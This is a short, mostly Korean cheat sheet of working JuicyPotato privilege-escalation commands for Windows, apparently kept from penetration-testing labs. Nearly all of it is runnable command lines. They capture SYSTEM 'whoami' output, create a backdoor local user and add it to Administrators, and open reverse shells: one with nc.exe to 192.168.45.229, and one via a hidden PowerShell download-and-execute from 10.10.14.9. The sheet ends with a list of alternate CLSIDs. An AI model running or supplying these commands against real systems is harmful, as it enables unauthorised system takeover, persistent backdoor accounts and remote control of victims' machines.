• https://ohpe.it/juicy-potato/
• https://ohpe.it/juicy-potato/CLSID/ - CLSID

SYSTEM 권한 확인용 간단 실행 NT AUTHORITY\\SYSTEM 으로 찍히면 성공.

.\\JuicyPotato.exe -l 1337 -p "C:\\Windows\\System32\\cmd.exe" -a "/c whoami /all > C:\\Users\\merlin\\Desktop\\jp.txt" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

type C:\\Users\\merlin\\Desktop\\jp.txt

새 계정 생성 & 관리자 그룹 추가

# 1) 로컬 유저 생성
.\\JuicyPotato.exe -l 1337 -p "cmd.exe" -a "/c net user wook WookPass123! /add" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

# 2) Administrators 그룹에 추가
.\\JuicyPotato.exe -l 1337 -p "cmd.exe" -a "/c net localgroup administrators wook /add" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

리버스쉘

# this definitely worked
.\jp.exe -t * -p c:\windows\system32\cmd.exe -a "/c C:\Users\apache\Desktop\nc.exe 192.168.45.229 1337 -e cmd.exe" -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}"

# 타겟 윈도우
.\\JuicyPotato.exe -l 1337 -p "cmd.exe" -a "/c powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('<http://10.10.14.9/Invoke-PowerShellTcp.ps1>');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4444" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

다른 CLSID

# 가장 먼저 시도 BITS 서비스 CLSID
{4991d34b-80a1-4291-83b6-3328366b9097}

# 추가로 알려진 것들
{e60687f7-01a1-40aa-86ac-db1cbf673334}
{6d18ad12-bde3-4393-b311-099c346e6df9}
{03ca98d6-ff5d-49b8-abc6-03dd84127020}
{5c6c3c20-0cf4-11d1-b95a-0060977b9152}
{BA126AD1-2166-11D1-B1D0-00805FC1270E}